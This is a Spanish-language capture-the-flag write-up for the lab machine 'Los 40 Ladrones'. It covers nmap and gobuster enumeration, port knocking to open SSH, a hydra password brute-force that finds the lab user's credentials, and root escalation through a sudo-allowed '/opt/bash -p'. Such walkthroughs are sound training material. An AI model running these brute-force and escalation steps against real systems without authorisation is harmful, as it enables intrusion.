> For the complete documentation index, see [llms.txt](https://shinki-organization.gitbook.io/dw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://shinki-organization.gitbook.io/dw/write-ups/quickstart/maquinas-faciles/los-40-ladrones-write-up.md).

# Los 40 Ladrones write-up

## **Verificamos conexión con la máquina víctima**

<figure><img src="/files/vxQSKegROqFKgtWpPML3" alt=""><figcaption></figcaption></figure>

## **Realizamos un escaneo de los puertos abiertos de la máquina víctima**

Utilizamos **nmap** para escanear los puertos abiertos de la máquina víctima con el siguiente comando:

```bash
sudo nmap -p- -sCVS --min-rate=5000 -vvv -Pn -n -O 172.17.0.2
```

<figure><img src="/files/UUgtSZqboel9W2X1jm9g" alt=""><figcaption></figcaption></figure>

El escaneo nos indica que el puerto 80 (HTTP) está abierto. Así que ingresamos la IP de la máquina víctima en el navegador y observamos lo siguiente:

<figure><img src="/files/PBi1YvFStn3i4f2AuhP0" alt=""><figcaption></figcaption></figure>

Como no vemos nada interesante, utilizamos la herramienta llamada `gobuster` para encontrar rutas o archivos ocultos con el siguiente comando:

```bash
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php,py 
```

<figure><img src="/files/XTpCjb5RfSTtpKFMnAQY" alt=""><figcaption></figcaption></figure>

Esto nos indica que existe un archivo TXT con nombre `/qdefense.txt`, así que ingresamos la dirección `http://172.17.0.2/qdefense.txt` en el navegador y vemos lo siguiente:

<figure><img src="/files/SIsTxgCZLamMZglh5zaD" alt=""><figcaption></figcaption></figure>

Esto nos indica que se podría estar usando `knockd` para cerrar algún puerto, así que vamos a ejecutar el siguiente comando para abrirlo:

```bash
knock 172.17.0.2 7000 8000 9000
```

Ahora volveremos a escanear los puertos abiertos con **nmap** y observamos lo siguiente:

<figure><img src="/files/USjGOxL7ey07J8Jil6qi" alt=""><figcaption></figcaption></figure>

Esto nos indica que el puerto 22 (SSH) está abierto, así que vamos a probar a hacer un ataque de fuerza bruta con **hydra** para el usuario `toctoc` con el siguiente comando:

```bash
hydra -l toctoc -P ../rockyou.txt -I ssh://172.17.0.2 -V -F -u
```

<figure><img src="/files/BrfSdBNRogAc1CEiNPpB" alt=""><figcaption></figcaption></figure>

Esto indica que la contraseña del usuario `toctoc` es `kittycat`. Así que ahora accedemos a la máquina víctima con las siguientes credenciales.

<figure><img src="/files/TSZw14ohqrQ9GHhXU80w" alt=""><figcaption></figcaption></figure>

## **Escalada de privilegios**

Una vez dentro de la máquina víctima, ejecutamos el comando `sudo -l`, el cual nos indica que podemos ejecutar la shell `/opt/bash` como cualquier usuario. Así que ejecutamos el siguiente comando para obtener una shell con privilegios elevados:

```bash
sudo /opt/bash -p
```

<figure><img src="/files/H7yIXGCAus1ZmlJSqn1x" alt=""><figcaption></figcaption></figure>
